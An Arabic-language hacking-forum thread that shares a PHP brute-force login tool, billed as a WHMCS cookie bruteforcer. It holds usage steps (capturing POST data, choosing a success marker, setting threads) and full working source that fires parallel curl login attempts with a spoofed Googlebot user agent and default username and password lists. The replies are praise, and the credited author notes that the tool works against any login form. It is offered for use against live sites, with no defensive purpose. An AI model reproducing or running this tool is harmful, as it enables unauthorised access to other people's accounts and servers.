1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Ubuntu | المشاهدات : 1,071 | الردود : 6
حالة الموضوع:
مغلق
  1. Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    [​IMG]


    صحا فطوركم و صحا سحوركم
    سكربت يعمل بروت فورس طبعآ غني عن التعريف
    whmcs cookie bruteforcer
    صوره للسكربت


    [​IMG]


    نأتي للشرح مباشرة :


    Target


    تضع هنا رابط الموقع كامل
    في بعض الاحيان البيانات تعمل بوست لصفحة اخرى لذلك يجب و ضع الرابط الذي يذهب اليه البوست


    Post Data


    اولا نذهب الى صفحة دخول الموقع المراد عمل بروت فورس له :


    اليوزر :
    كود PHP:
    user_massacreur
    الباس:
    كود PHP:
    pass_massacreur

    الاستخراج البوست داتا استعمل اضافة فيرفوكس


    Live HTTP Headers 0.17


    ننسخ كامل عمليات البوست و الGET ان وجدت مع ملاحظة عمليات ال GET يوضع مع Target


    Marqueur positif
    هنا كل واحد و حيله يعني ما هو الاسم الموجود في اللوحة عند الدخول وليس موجود قبل الدخول
    هذا اهم جزء في السكربت لازم تكون كلمة مميزة


    MultiThreading
    السرعة : لم اضع رقم واضح انا افضل 20 و هناك عداد اضفته للتجربة
    يعني مدة البروت فورس


    الباقي وا ضح


    السورس كود :

    كود PHP:
     <?php
    /*
      coded by Massacreur || toxico-dz
      email : webservers@hotmail.fr
      Greetz :

        ||  alzher   ||   r0ckin  ||  Sql-Sniper || i-Hmx  || band3r  || Omleet-dz ||

      home : sec4ever.com

    */


    set_time_limit(0);
    if (isset (
    $_POST['target']) and isset ($_POST['data']) and isset ($_POST['users']) and isset ($_POST['passwords'])) {
      function 
    cln_arr($array) {
        return @ 
    array_filter(@ array_unique($array));
      }
      function 
    addHandle(& $curlHandle$url$post false$flw 1$timeout 30$cookies 1) {
        
    $cURL curl_init();
        
    curl_setopt($cURLCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($cURLCURLOPT_URL$url);
        
    curl_setopt($cURLCURLOPT_SSL_VERIFYPEER0);
        
    curl_setopt($cURLCURLOPT_HEADER0);
        if (
    $cookies == 1) {
          
    curl_setopt($cURLCURLOPT_COOKIEFILEgetcwd() . '/cookie.txt');
          
    curl_setopt($cURLCURLOPT_COOKIEJARgetcwd() . '/cookie.txt');
        }
        
    curl_setopt($cURLCURLOPT_USERAGENT'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
        
    curl_setopt($cURLCURLOPT_FOLLOWLOCATION$flw);
        
    curl_setopt($cURLCURLOPT_TIMEOUT$timeout);
        if (
    $post) {
          
    curl_setopt($cURLCURLOPT_POST1);
          
    curl_setopt($cURLCURLOPT_POSTFIELDS$post);
        }
        
    curl_multi_add_handle($curlHandle$cURL);
        return 
    $cURL;
      }
    //execute the handle until the flag passed to function is greater then 0
      
    function ExecHandle(& $curlHandle) {
        
    $flag null;
        do {
          
    curl_multi_exec($curlHandle$flag);
    //fetch pages in parallel
        
    } while ($flag 0);
      }
      
    $url $_POST['target'];
      
    $data $_POST['data'];
      
    $mark '/' $_POST['mark'] . '/';
      
    $multithreading $_POST['multithreading'];
    //login=user_massacreur&password=pass_massacreur
      
    $users cln_arr(explode("\n"$_POST['users']));
      
    $passwords cln_arr(explode("\n"$_POST['passwords']));
      
    $data trim($data);
      for (
    $i 0; isset ($users[$i]); $i++) {
        
    $post_0[] = preg_replace('/user_massacreur/'trim($users[$i]), $data);
      }
      for (
    $i 0; isset ($post_0[$i]); $i++) {
        for (
    $h 0; isset ($passwords[$h]); $h++) {
          
    $post[] = preg_replace('/pass_massacreur/'trim($passwords[$h]), $post_0[$i]);
        }
      }
      
    $start_time time();
      for (
    $k 0; isset ($post[$k $multithreading]); $k++) {
        
    $jstart + ($k) * $multithreading;
        
    $jstop + ($k 1) * $multithreading;


        
    $curlHandle curl_multi_init();
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++)
          
    $curl[$i] = addHandle($curlHandle$url$post[$i], 1301);
        
    ExecHandle($curlHandle);
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++) {
          
    $text[$i] = curl_multi_getcontent($curl[$i]);
          if (
    preg_match($mark$text[$i])) {
            
    $baki= ($i 1)%count($passwords) ;  //48=3*15+3
            
    $id_user=($i-$baki1) / count($passwords);
            
    $id_pass=$baki   ;
            echo 
    '<font size="4" color="#FF0000">' . ($i 1) . ') yes  === > the user is :     <font size="4" color="#FF00FF">'.$users[$id_user].'</font>      the pass is : <font size="4" color="#FF00FF">'.$passwords[$id_pass-1].'</font><br /></font>';
          }
          else { echo (
    '<font size="4" color="#0000FF">' . ($i 1) . ') non  === > ' $post[$i] . '</font> <br />');}
        }
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++)
    //remove the handles
          
    curl_multi_remove_handle($curlHandle$curl[$i]);
        
    curl_multi_close($curlHandle);
      }
      
    $end_time time();
      
    $duree $end_time $start_time;
      echo 
    '<center><font size="7" color="#00FF00"> N° of pass tested :'.count($post).' pass /'$duree ' sec</font></center>';

    }
    else {
      echo 
    "

      <!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'
        'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
        <head>
      <title>Multithreading Brute Force Standard</title>
    </head>

    <body>

    <center><br>
            <h2>Multithreading Brute Force Standard</h2>
    <br>
    <form name='dz' method='POST' action=''>
        &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;&nbsp;Target&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;      : <input name='target' />     <br /><br />
       &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Post Data&nbsp;&nbsp;&nbsp;&nbsp;    : <input name='data' /> <br /><br />
     Marqueur positif : <input name='mark' value='logout' /> <br /><br />
      MultiThreading  : <input name='multithreading' value='20' /> <br /><br />
    <textarea rows='10' name='users' id='targets' cols='30'>admin
    administrateur
    login
    test
    </textarea>
    <textarea rows='10' name='passwords' cols='30'>admin
    123456
    123123
    102030
    159753
    1234567
    test
    12345678
    123456789
    </textarea><br><br>
    <input type='submit'  value='Start BruteForce' />
    </form>
    </center>
    "
    ;
    }
    ?>

    التحميل


    [​IMG]


    رابط اخر


    [​IMG]


    [​IMG]
     
    1 person likes this.
  2. wesker Hacker Developer

    الأنتساب:
    ‏12 يناير 2013
    المشاركات:
    48
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    بارك الله فيك يامبدع

    جاري الـ ++ و التقييم + يوشم بالخماسي + لايك

    تستاهل
    &:" ​
     
  3. Ĝυēναяα Developer

    الأنتساب:
    ‏21 يونيو 2012
    المشاركات:
    103
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    فلسطين
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    [b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][size=5][color=silver][font=tahoma][b][size=2]» [/size][/b][/font][/color][/size][/size][/font][/b][/size][/font][/b][/size][/font][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][color=#419c70][font=tahoma][size=2][b]وَعّليڪُم السُلامَ ورَحَمُــۃ اللهُ وبرڪَإآتــۃ [/b][/size][/font][/color][size=5][color=silver][font=tahoma][b][size=2]»[/size][/b][/font][/color][/size][/size][/font][/b][/size][/font][/b][/size][/font]

    [font=tahoma][size=2][color=#c0c0c0][b]بارك الله فيك يامبدع[/b][/color][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b]
    :{1}:​
     
  4. Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    شكرا لك اخي
    وبالتوفيق&:":​
     
  5. Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    موفق اخي ​
     
  6. Stav Ak Developer

    الأنتساب:
    ‏18 يونيو 2013
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    دورک ؟
     
  7. massacreur Developer

    الأنتساب:
    ‏24 ابريل 2013
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    حبيبي
    السكربت تبعي لكن الظاهر انك خلطت بين السكربتين
    هذا السكربت يعمل brute force على اي سكربت وليس whmcs
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة